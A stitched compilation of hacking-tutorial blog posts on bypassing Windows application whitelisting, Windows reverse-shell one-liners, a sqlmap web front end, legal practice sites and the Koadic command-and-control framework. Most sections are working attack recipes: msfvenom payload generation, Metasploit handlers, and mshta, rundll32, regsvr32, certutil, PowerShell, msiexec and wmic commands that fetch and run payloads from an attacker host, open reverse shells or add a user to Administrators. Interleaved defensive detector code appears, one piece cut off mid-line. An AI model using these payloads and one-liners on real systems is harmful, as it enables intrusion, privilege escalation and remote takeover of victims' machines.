The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.

When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.

Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.

Multiple Methods to get CMD

Generate Malicious .msi file with Msfvenom -1st Method

Now let's open a new terminal on the Kali machine and generate a malicious MSI package file named cmd.msi, which will give us a command prompt through the windows/exec payload, as follows:

msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi
python -m SimpleHTTPServer 80

Now transfer the cmd.msi file to your Windows machine to obtain a command prompt as administrator. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded the .msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.

Syntax: msiexec /quiet /i <path of downloaded .msi file>

msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi

As soon as you enter the above command in the Run prompt, you will get the Command Prompt.


Generate Malicious .msi file with Msfvenom -2nd Method

Note: Even if you rename the cmd.msi file to another extension, it will bypass the rule and start a command prompt as administrator.

Repeat the above to generate an msi file with the same msfvenom payload, named cmd.png. Since I already have a cmd.msi file in my Kali, I renamed it to cmd.png and used a Python server to transfer it.

Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/cmd.png

As soon as you enter the above command in the Run prompt, you will get the Command Prompt.

Generate Malicious .msi file with Msfvenom -3rd Method

In the above methods we obtained a command prompt using the windows/exec payload; now we will use the windows/meterpreter/reverse_tcp payload to get a full-privilege command shell via a meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f msi > shell.msi

Now again transfer the shell.msi file to your Windows machine to obtain a command prompt as administrator, and start multi/handler. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded the shell.msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/shell.msi

As soon as you enter the above command in the Run prompt, you will get the Command Prompt as administrator via the meterpreter session from this handler:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit
meterpreter > shell

Challenge 2: – Make a local user member of Administrators Group

Let's suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restrictions.

Then how will you use an msi file to bypass these restrictions and make a local user a member of the Administrators group when cmd.exe is blocked?

Note: Here aaru is a local user account that is a non-administrative user account, as shown below:

As we know, due to the AppLocker execution rule policy cmd.exe is blocked on the local machine, therefore we cannot use the command prompt to add aaru to the administrators group.

Generate Malicious .msi file with Msfvenom -4th Method

Generate an MSI package as admin.msi with the windows/exec payload that carries a command adding the user "aaru" to the local administrators group on the target machine.

msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi

Now transfer the admin.msi file to your Windows machine to add aaru to the administrators group. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded the admin.msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/admin.msi

As soon as you enter the above command in the Run prompt, you can confirm that the aaru user has become a member of the administrators group.

Hopefully it is now clear how you can use an .msi file to compromise an operating system where cmd.exe and other applications are blocked by the administrator.
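The renaming trick in the second method works because msiexec does not care about the file extension, so a defender's check should not either. As an added example (it is not part of this article), the Python below recognises a Windows Installer package by its OLE compound-document header regardless of the file name, and separately parses msiexec command lines to flag a package fetched from a URL or UNC path, a quiet install, or a package whose extension is not .msi. The sample bytes are constructed; the command lines are the ones shown in this article.

```python
import re
from typing import List

# Magic bytes of an OLE2 compound document, the container format used by
# Windows Installer packages (.msi/.msp/.mst) and by legacy Office formats.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Extensions under which an OLE compound file is expected.
OLE_EXPECTED_EXT = {".msi", ".msp", ".mst", ".doc", ".xls", ".ppt", ".msg"}

# Constructed sample contents: a fake installer header and a PNG header.
SAMPLE_OLE_BYTES = OLE_MAGIC + b"\x00" * 24
SAMPLE_PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24


def file_ext(name: str) -> str:
    """Lower-cased extension of a path or URL, '' when there is none."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return base[base.rfind("."):].lower() if "." in base else ""


def is_ole_compound(data: bytes) -> bool:
    """True when the first bytes carry the OLE compound-document signature."""
    return data[:8] == OLE_MAGIC


def looks_like_disguised_installer(name: str, data: bytes) -> bool:
    """True when the content is an OLE compound document but the file name
    claims an unrelated type (e.g. cmd.msi renamed to cmd.png)."""
    return is_ole_compound(data) and file_ext(name) not in OLE_EXPECTED_EXT


# msiexec switches: quiet/basic UI variants, install switches, the binary itself.
_QUIET = re.compile(r"(?i)^[/-](?:q[nbrf]?[!+-]?|quiet)$")
_INSTALL = re.compile(r"(?i)^[/-](?:i|package)$")
_MSIEXEC = re.compile(r"(?i)^(?:.*[\\/])?msiexec(?:\.exe)?$")


def analyze_msiexec(cmdline: str) -> List[str]:
    """Return the reasons an msiexec command line deserves attention.

    An empty list means either the command is not msiexec at all or it is a
    plain install of a local .msi with a visible UI. Quiet installs are common
    for software deployment, so treat that reason as a weak signal on its own.
    """
    tokens = [t.strip('"') for t in cmdline.split()]
    if not tokens or not _MSIEXEC.match(tokens[0]):
        return []
    reasons: List[str] = []
    package = None
    # The package argument is the token following /i or /package.
    for i, tok in enumerate(tokens[1:-1], start=1):
        if _INSTALL.match(tok):
            package = tokens[i + 1]
            break
    if package is None:
        return reasons
    if re.match(r"(?i)https?://", package) or package.startswith("\\\\"):
        reasons.append("remote package source")
    if any(_QUIET.match(t) for t in tokens[1:]):
        reasons.append("quiet install")
    if file_ext(package) not in {".msi", ".msp"}:
        reasons.append("package extension is not .msi")
    return reasons


if __name__ == "__main__":
    print(looks_like_disguised_installer("cmd.png", SAMPLE_OLE_BYTES))
    print(analyze_msiexec("msiexec /q /i http://192.168.1.107/cmd.png"))
```

The content check is what makes the rename in the second method visible: a proxy or endpoint control that inspects bytes rather than names sees the same OLE header in cmd.png that it sees in cmd.msi. The command-line check keys on the install switch and its argument, so a .msi under any name fetched over HTTP still produces the "remote package source" reason.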

References:

https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using msiexec.exe (Multiple Methods) appeared first on Hacking Articles.

Get Reverse-shell via Windows one-liner

This article will help those who play with CTF challenges, because today we will discuss "Windows One-Liners" that use commands such as PowerShell or rundll32 to get a reverse shell from a Windows system. Generally, while abusing HTTP services or other programs, we find an RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to make the target machine open a reverse connection.

Table of Content

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch certutil Attack via Msfvenom

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch cscript.exe via Powershell
  • Launch Batch File Attack via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA (HTML Application) files. These are HTML files that can run JavaScript or VBScript. You can interpret these files using the Microsoft mshta.exe tool.

Metasploit contains the "HTA Web Server" module, which generates a malicious hta file. This module hosts an HTML Application (HTA) that, when opened, will run a payload via PowerShell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now run the malicious code through mshta.exe on the victim's machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the malicious hta file on the remote machine with the help of mshta.exe, you get a reverse connection at your local machine (Kali Linux).

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

As you can observe, we have a meterpreter session of the victim, as shown below:

Rundll32.exe

Rundll32.exe is a Windows operating system utility that loads a DLL, either 16-bit or 32-bit, into memory and invokes a function exported from it.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contains the "SMB Delivery" module, which generates a malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the dll file on the remote machine with the help of rundll32.exe, you will get a reverse connection at your local machine (Kali Linux).

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

As you can observe, we have a meterpreter session of the victim, as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module quickly fires up a web server that serves a payload and provides a command that will download and execute the payload, either through the specified scripting-language interpreter or through "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command, e.g. in a command injection.

Regsvr32 uses the "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary regsvr32 is able to request an .sct file and then execute the PowerShell command included in it. Both web requests (i.e. the .sct file and the PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to disk, allowing custom binaries to be served up to be downloaded and executed.

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.

Once you execute scrobj.dll on the remote machine with the help of regsvr32.exe, you will get a reverse connection at your local machine (Kali Linux).

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xt5dIF.sct scrobj.dll

As you can observe that, we have meterpreter session of the victim as shown below:

Certutil.exe

Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to fetch and execute our malicious exe file on the target machine to get a meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get a reverse shell from the victim's machine.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe


Now, to download shell.exe onto the target with certutil and run it, you can follow the syntax below:

Syntax: certutil.exe -urlcache -split -f <URL of executable file> <local file name>

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from official website of Microsoft Windows from here.

Launch Powercat attack via Powershell

Powercat is a PowerShell-native backdoor listener and reverse shell, also known as a modified version of netcat, because it has integrated support for generating encoded payloads (which msfvenom would otherwise do) and also has a client-to-client relay, a term for a Powercat client that allows two separate listeners to be connected.

Download powercat on your local machine, serve powercat.ps1 with the Python HTTP server to obtain a reverse shell from the target as shown below, and start a netcat listener.

git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

Then execute the following command on the remote side to get a netcat session.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

As you can observe that, we have netcat session of the victim as shown below:

Batch File

Similarly, PowerShell allows the client to execute a bat file, therefore let's generate a malicious bat file with msfvenom as given below and start a netcat listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then execute the following command on the remote side to get a netcat session.

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))"

As you can observe that, we have netcat session of the victim as shown below:

Cscript

Similarly, PowerShell allows the client to run cscript.exe to execute wsf, js and vbs scripts, therefore let's generate a malicious vbs file with msfvenom as given below and start multi/handler as the listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

Then execute the following command on the remote side to get a meterpreter session.

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Msiexec.exe

As we are all aware, Windows comes with the Windows Installer engine installed, which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.

Launch msiexec attack via msfvenom

Let's generate an MSI package file (1.msi) using the Windows Meterpreter payload as follows, and start multi/handler as the listener.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

Once you execute the 1.msi file on the remote machine with the help of msiexec, you will get a reverse connection at your local machine (Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Wmic.exe

The WMIC utility is a Microsoft tool that provides a WMI command-line interface used for a variety of administrative functions on local and remote machines; it is also used for WMI queries such as reading system settings, stopping processes and executing scripts locally or remotely. It can therefore invoke an XSL (eXtensible Stylesheet Language) script.

Launch Wmic.exe attack via Koadic

Now we will generate a malicious XSL file with the help of Koadic, a Command & Control tool that is quite similar to Metasploit and PowerShell Empire.

To learn how Koadic works, read our article here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation is complete, you can run the ./koadic file to start Koadic. Start by loading the stager/js/wmic stager with the following commands, and set SRVHOST to the address the stager should call home to.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute the following WMIC command to download and run the malicious XSL file from the remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file is executed on the target machine, you will have a zombie connection, just like a session in Metasploit.
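Every one-liner in this post, and the mshta methods earlier on the page, leaves the same kind of trace: a signed Windows binary launched with a remote or scriptlet source. As an added example (not part of the article), the Python below runs a small set of command-line rules over constructed process-creation events (tab-separated timestamp, user, parent image, command line, loosely modelled on Sysmon event 1 or Windows 4688 data) and reports which technique each matches. The sample command lines are the ones quoted in this post plus a few benign ones that must not fire; the event format and the rule labels are this example's own.

```python
import re
from typing import List, Tuple

# Detection rules: (technique label, regex over the process command line).
# Each pattern keys on the binary plus the argument shape that points at a
# remote or scriptlet source, not on the binary name alone, since all of
# these binaries are also used legitimately.
LOLBIN_RULES: List[Tuple[str, re.Pattern]] = [
    ("mshta remote HTA",
     re.compile(r'(?i)\bmshta(?:\.exe)?\b.*?(?:https?://|\\\\)')),
    ("rundll32 DLL from UNC path",
     re.compile(r'(?i)\brundll32(?:\.exe)?\b\s+"?\\\\')),
    ("regsvr32 scriptlet (squiblydoo)",
     re.compile(r'(?i)\bregsvr32(?:\.exe)?\b.*?(?:/i:\S*https?://|\bscrobj\.dll\b)')),
    ("certutil URL download",
     re.compile(r'(?i)\bcertutil(?:\.exe)?\b.*?[-/]urlcache\b.*?https?://')),
    ("powershell download cradle",
     re.compile(r'(?i)\bpowershell(?:\.exe)?\b.*?(?:\.DownloadString\(|\.DownloadFile\(|\bIEX\b|Invoke-Expression)')),
    ("msiexec remote package",
     re.compile(r'(?i)\bmsiexec(?:\.exe)?\b.*?[/-](?:i|package)\s+"?(?:https?://|\\\\)')),
    ("wmic remote XSL stylesheet",
     re.compile(r'(?i)\bwmic(?:\.exe)?\b.*?/format:"?\S*?(?:https?://|\.xsl\b)')),
]

# Constructed events: (timestamp, user, parent image, command line).
SAMPLE_EVENTS = [
    ("2019-03-04T10:00:01Z", "raj", "cmd.exe",
     "mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta"),
    ("2019-03-04T10:00:02Z", "raj", "cmd.exe",
     r"rundll32.exe \\192.168.1.109\vabFG\test.dll,0"),
    ("2019-03-04T10:00:03Z", "raj", "cmd.exe",
     "regsvr32 /s /n /u /i:http://192.168.1.109:8080/xt5dIF.sct scrobj.dll"),
    ("2019-03-04T10:00:04Z", "raj", "cmd.exe",
     "certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe"),
    ("2019-03-04T10:00:05Z", "raj", "cmd.exe",
     "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1')\""),
    ("2019-03-04T10:00:06Z", "raj", "explorer.exe",
     "msiexec /q /i http://192.168.1.109/1.msi"),
    ("2019-03-04T10:00:07Z", "raj", "cmd.exe",
     'wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"'),
    # Benign uses of the same binaries; none of these should match.
    ("2019-03-04T10:01:01Z", "SYSTEM", "services.exe",
     "rundll32.exe shell32.dll,Control_RunDLL"),
    ("2019-03-04T10:01:02Z", "raj", "cmd.exe",
     r"regsvr32 /s C:\Program Files\App\app.dll"),
    ("2019-03-04T10:01:03Z", "SYSTEM", "ccmexec.exe",
     r"msiexec /i C:\installers\app.msi /qn"),
    ("2019-03-04T10:01:04Z", "raj", "cmd.exe",
     r"certutil -verify C:\certs\cert.cer"),
    ("2019-03-04T10:01:05Z", "raj", "cmd.exe",
     r"powershell -File C:\scripts\backup.ps1"),
    ("2019-03-04T10:01:06Z", "raj", "cmd.exe",
     "wmic os get /format:list"),
]
SAMPLE_PROCESS_LOG = "\n".join("\t".join(e) for e in SAMPLE_EVENTS)


def scan_process_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (technique, command line) for every event matching a rule.

    Lines are tab-separated: timestamp, user, parent image, command line.
    Malformed lines are skipped; a line can match more than one rule.
    """
    hits: List[Tuple[str, str]] = []
    for line in log_text.splitlines():
        fields = line.split("\t", 3)
        if len(fields) < 4:
            continue
        cmdline = fields[3]
        for label, pattern in LOLBIN_RULES:
            if pattern.search(cmdline):
                hits.append((label, cmdline))
    return hits


if __name__ == "__main__":
    for label, cmdline in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"{label:32s} {cmdline}")
```

The benign events are there to show the shape of the rules: a rundll32 call of a local DLL, a silent local msiexec install or a certutil -verify pass through untouched, while the same binaries with an http://, UNC or .sct/.xsl argument are reported. In a real deployment the parent-image and user fields carry the next layer of context (an Office or browser parent for any of these is a much stronger signal than the command line alone).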

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Get Reverse-shell via Windows one-liner appeared first on Hacking Articles.

Configure Sqlmap for WEB-GUI in Kali Linux

Hello everyone and welcome to this tutorial on setting up SQLMAP with a web GUI. Web GUI simply refers to the interface that a browser provides you over the HTTP/HTTPS service.

SQLMAP is a popular tool for performing SQL injection attacks on sites affected by MySQL errors; be it an error-based SQL injection or a hidden one, sqlmap is the biggest tool there is for SQL injection attacks. But very few people know that sqlmap also provides an API for its service, written in Python, that we can use to develop a front end for the same sqlmap that normally runs on the command line.

One such person is Hood3dRob1n (https://github.com/Hood3dRob1n/SQLMAP-Web-GUI), who has created a PHP-based front end for sqlmap, and today we'll be setting it up in Kali Linux. Needless to say, it will be compatible with any Linux distro.

Let’s get started.

Table of Contents:

  1. Cloning the github repository and giving necessary permissions
  2. Locating and hosting the API
  3. Launching the front end
  4. Attacking practice lab for SQLi

Cloning the github repository

First, we need to clone the Hood3dRob1n repository. To clone, we’ll use the git clone command and put the folder named sqlmap inside “/var/www/html.”

git clone https://github.com/Hood3dRob1n/SQLMAP-Web-GUI
cd SQLMAP-Web-GUI
mv sqlmap ..
cd ..
chmod 777 sqlmap


Locating and hosting the API

The next step is to start an Apache server. If you don't have Apache pre-installed, you can install it with the apt-get install apache2 command.

After we have started the Apache server, we need to run sqlmapapi.

The default folder varies between Linux distros, so we used the locate command to find the file named "sqlmapapi.py".

We need to run this API using the command:

python /usr/share/sqlmap/sqlmapapi.py -s

Launching the front end

If you have followed this tutorial so far, you'll see the following screen when you open localhost/sqlmap.

And voila! Just like that you are ready to start injecting SQL queries.

Attacking practice lab for SQLi

There are essentially 6 tabs here.

  • BASIC: This tab allows you to set the URL to test for SQL injection. You can set the HTTP method too; the given options are POST, PUT, HEAD etc.
  • REQUEST: Allows you to modify your request with optional parameters like time delay, timeout between requests, number of connection retries, user agent etc.
  • INJECTION & TECHNIQUE: Lets you choose which kind of injection and techniques you are applying (boolean-based, error-based, inline etc.) as well as other options like the use of DBMS hex functions for data retrieval, the kind of database (MySQL or MSSQL) and so on.
  • DETECTION: To set a custom string to match.
  • ENUMERATION: What data to retrieve, e.g. the current user and a dump of the current database. Or, if you are feeling fancy, all users and a dump of all data. You can play around with it.
  • ACCESS: Access parameters. Leave this at the default if you don't know your way around it.

We will set the parameters one by one as we proceed. But we never attack live websites, hence we used another PC with the IP address 192.168.1.105 to host a practice lab for SQL injection attacks called SQL-Dhakkan. Refer to this article to learn how you can set it up yourself!

If you have set up the lab successfully, you'll get a screen something like this:

I am on Lesson 1 currently and I know that id=1 has an error based SQLi vulnerability. So, let’s copy this URL to our web-gui sqlmap.

It is highly recommended that you get yourself familiar with HTTP methods and read how to manually attack SQLi here because it will give you a profound idea of the options we will be selecting further in the tutorial. But if you wish to continue with the tutorial instead, who am I to stop you!

Go to the enumeration tab and select the methods that you want to test.

Once set, set the type of SQLi you want to perform.

Once you are satisfied with the choices you input, run the scan!

For the purpose of this tutorial we have performed a really basic scan that tells us the current database and hostname, but you can play around with the parameters as you like.

Conclusion: Web based GUI for sqlmap is definitely a plus point over the traditional sqlmap for many reasons, one of them being the ease of access. There is no need to remember such long commands. Drag, drop and done!

Plus, web-based GUI is nothing but a web app for you. A web app that runs sqlmap, isn’t it great?

Hope you enjoyed this little tutorial.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Configure Sqlmap for WEB-GUI in Kali Linux appeared first on Hacking Articles.

20+ Free Resources To Legally Practice Your Ethical Hacking Skills

There's no better way to gain confidence in your ethical hacking skills than by actually practicing them in real life. So, where can one do that? We searched the web for solutions, and here are the top free resources we found.

  1. Hack.me hosts a number of vulnerable apps and allows its community to build, host and share their vulnerable application code for educational and research purposes.
  2. Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests.
  3. Hack This Site is more than just another hacker wargames site, it's a living, breathing community with many active projects in development.
  4. Try2Hack provides several security oriented challenges for your entertainment.
  5. HackThis is a legal and safe network security resource where users test their hacking skills on various challenges and learn more about hacking.
  6. CTF365 allows you to defend your servers and launch attacks on others, all using the exact same techniques that work in the real world.
  7. OverTheWire helps you learn and practice security concepts in the form of fun-filled games.
  8. Hacking-Lab is providing CTF and mission style challenges for international competitions, like the European Cyber Security Challenge.
  9. Pwnable.kr is a non-commercial wargame site which provides various pwn challenges regarding system exploitation.
  10. SmashTheStack is a wargaming Network hosting several wargames.
  11. IO is a wargaming community with several free wargames available.
  12. Microcorruption is an embedded security CTF where you have to reverse engineer fictional Lockitall electronic lock devices.
  13. W3Challs is a penetration testing platform, which offers various computer challenges, in categories related to security: Hacking, Cracking, Wargame, Forensic, Cryptography, Steganography and Programming.
  14. PWN0 is the VPN where (almost) anything goes, that allows you to go up against pwn0bots or other users and score points by gaining root on other systems.
  15. Hellbound Hackers is a completely legal, web-based security training ground, offering challenges that teach you how computer based exploits work.
  16. Damn Vulnerable iOS App (DVIA) provides a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills in a legal environment.
  17. Root Me allows you to practice your ethical hacking skills across a variety of scenarios.
  18. CTFtime is a great resource to stay up-to-date on CTF events happening around the globe.
  19. WebGoat is an insecure app available for Windows, OS X Tiger and Linux and also runs in Java and .NET environments.
  20. Juice Shop is an insecure web application based on JavaScript for anyone that's into coding or testing JavaScript but doesn't understand the security issues that can arise.
  21. Hackademic is an OWASP open-source project and offers 10 realistic scenarios which are full of vulnerabilities.
  22. Hackxor is a web app hacking game focusing on cross-site scripting, cross-site request forgery and SQL injection vulnerabilities.
  23. BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
  24. EnigmaGroup is designed for anyone that wishes to improve their security knowledge and hosts a wide variety of vulnerabilities.
  25. Google Gruyere is designed for the absolute beginner to learn how hackers find security vulnerabilities, how they exploit web applications and how to protect applications from being exploited.

Tools to legally practice your ethical hacking skills are not what’s missing on the web, and some really good ones are even free to use. Let us know if you’ve tried some other good ones and think they’d be a great addition to this list. 😉 


Sources: WheresMyKeyboard?, Bonkers about Tech, Checkmarx


Koadic – COM Command & Control Framework

Hello friends!! In this article we are introducing another very interesting tool, "KOADIC – COM Command & Control", which is quite similar to Metasploit and PowerShell Empire. So let's begin with its tutorial and check its functionality.

Table of Content

  • Introduction to Koadic
  • Installation of Koadic
  • Usage of Koadic
  • Koadic Stagers
  • Privilege Escalation with Koadic Implants
  • Post Exploitation
    • Generate Fake Login Prompt
    • Enable Rdesktop
    • Inject Mimikatz
    • Execute Command
    • Obtain Meterpreter Session from Zombie Session

Introduction to Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Source – https://github.com/zerosum0x0/koadic

Installation of Koadic

Koadic must first be downloaded and installed before it can be used. Run the following commands to clone Koadic from GitHub and install its dependencies.

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

apt-get install python3-pip
pip3 install -r requirements.txt
./koadic

Usage of Koadic

This tool depends mainly on stagers and implants. It contains 6 stagers and 41 implants.

Stager: Stagers hook target zombies and allow you to use implants.

Implants: Implants start jobs on zombies.

Once installation is complete, run ./koadic to start Koadic. The most helpful command for a synopsis of Koadic’s usage is help, which summarizes the available commands. Koadic functions similarly to other frameworks such as Metasploit.

To list all available modules in the terminal, run “use <tab> <tab>”. This dumps all implants and stagers available for execution. Alternatively, explore the stager modules with the following command:

use stager/js/

This lists all stagers that can be used to obtain a zombie session on the target machine.

Koadic Stagers

The stager defines where a zombie device contacts the Koadic command and control. These settings can be viewed by running the info command once the module is selected. Let’s start by loading the mshta stager (use stager/js/mshta) and setting its options as shown below.

Set SRVHOST to the address the stager should call home to and SRVPORT to the port to listen on; you can also set ENDPOINT to choose the name of the malicious file. Then enter run to execute.

set SRVHOST 192.168.1.107
set ENDPOINT sales
run

Now wait for the victim to run the command below, which executes the malicious file generated above.

mshta http://192.168.1.107:9999/sales

Once the malicious sales file is executed on the target machine, you will have a zombie connection, much like a session in Metasploit.

zombies 0
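From a detection standpoint, the stager above leaves a clear trace: mshta.exe started with an http(s) URL instead of a local .hta file. As an added example that is not part of the original article or of Koadic, the following PowerShell function flags such command lines; the process-creation records it runs over are constructed here for the demonstration (field names borrowed from Sysmon Event ID 1).

```powershell
# Added example (not from the article or Koadic): flag process-creation records whose
# command line launches mshta.exe with a remote URL, the shape of the stager above.
# The $sampleEvents records below are constructed for this demonstration; in practice
# feed the function the Image/CommandLine fields of Sysmon Event ID 1 or Security 4688.

function Find-RemoteMshtaLaunch {
    param([Parameter(ValueFromPipeline)] [pscustomobject]$Event)
    process {
        $cmd = $Event.CommandLine
        # Match on the image path or on a bare "mshta" in the command line (LOLBins are
        # often invoked via PATH); -match is case-insensitive by default.
        $isMshta = ($Event.Image -match '(^|\\)mshta\.exe$') -or
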